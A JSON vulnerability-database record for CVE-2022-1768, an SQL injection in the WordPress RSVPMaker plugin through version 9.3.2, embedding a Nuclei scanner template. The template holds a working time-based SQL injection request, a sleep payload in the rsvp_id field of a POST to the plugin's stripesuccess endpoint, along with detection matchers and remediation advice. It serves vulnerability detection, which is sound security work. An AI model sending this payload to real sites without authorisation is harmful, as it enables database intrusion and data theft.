{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-1768/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-1768/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-1768/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-1768/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-1768/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-1768"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-1768"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-1768.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2022-1768\n\ninfo:\n  name: WordPress RSVPMaker <=9.3.2 - SQL Injection\n  author: edoardottt\n  severity: high\n  description: |\n    WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.\n  remediation: |\n    Update to the latest version of the RSVPMaker plugin (9.3.3 or higher) to mitigate the SQL Injection vulnerability.\n  reference:\n    - https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc\n    - https://wordpress.org/plugins/rsvpmaker/\n    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2725322%40rsvpmaker&new=2725322%40rsvpmaker&sfp_email=&sfph_mail=\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-1768\n    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-1768\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2022-1768\n    cwe-id: CWE-89\n    epss-score: 0.1286\n    epss-percentile: 0.96125\n    cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: carrcommunications\n    product: rsvpmaker\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 15s\n        POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        rsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=7'\n\n      - type: word\n        part: body\n        words:\n          - '\"payment_confirmation_message\":'\n\n      - type: word\n        part: header\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 490a004630440220086b2f6bcb67153d31f87ee1ed38a8a076cc3761c78f5a6af42d927c10090d92022041418a0fa62ac4c8a805ef359cb3f53c9478b6954a7f3d8f328eba38bdb2afa5:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-1768"
}